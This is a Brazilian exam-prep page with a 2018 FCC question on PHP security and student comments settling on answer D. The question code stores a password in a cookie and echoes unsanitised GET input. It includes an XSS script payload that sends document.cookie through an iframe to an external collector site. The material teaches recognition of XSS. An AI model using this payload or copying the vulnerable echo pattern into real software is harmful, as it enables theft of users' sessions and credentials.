SóProvas

ID
2751934
Banca
FCC
Órgão
TRT - 2ª REGIÃO (SP)
Ano
2018
Provas
Disciplina
Programação
Assuntos

Considere o trecho de programa PHP abaixo.

<?php
setcookie('PHPSSESID', 'meu_sid');
setcookie('login', 'meu_login');
setcookie('senha', 'minha_senha');

echo $_GET['var'];
?>

Supondo que ao executar este trecho, um usuário passou como entrada:

<script>
    document.write('<iframe width=1 height=1
 src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(//g,'')+'></iframe>')
</script>

cujo objetivo é capturar os dados de cookie do site alvo e enviá-los para o site www.coletor.com

Um Técnico de TI conclui corretamente que

Alternativas
Comentários

  • GABARITO D

  • o trecho apresentado mostra que é possível capturar senha do e-mail?

    nem e-mail cita no código..


  • LETRA D

    Basta ler o link que nele próprio está escrito xss. Porém, de fato temos uma tentativa de injeção de script.

    EstudanteMK vamos tomar cuidado na leitura, para que não extrapolemos aquilo que foi dito pela banca.

    trata-se de um ataque do tipo XSS, pois com os dados de cookie é possível capturar senhas de e-mail.

    O que a alternativa está dizendo, é que ataques XSS podem capturar dados de senhas de e-mail do cookie. Isso é verdade, a alternativa em questão, não falou que o código passado faz isso.

    É muito comum a FCC apresentar um estudo de caso e logo em seguida apresentar respostas relacionadas ao assunto abordado, e não em relação ao estudo de caso em si. Como é o caso dessa questão e de muitas outras questões de direito da banca.

  • dei bobeira, tá claro que é a D, porque foi posta a senha no cookie:

    document.cookie = todos os cookies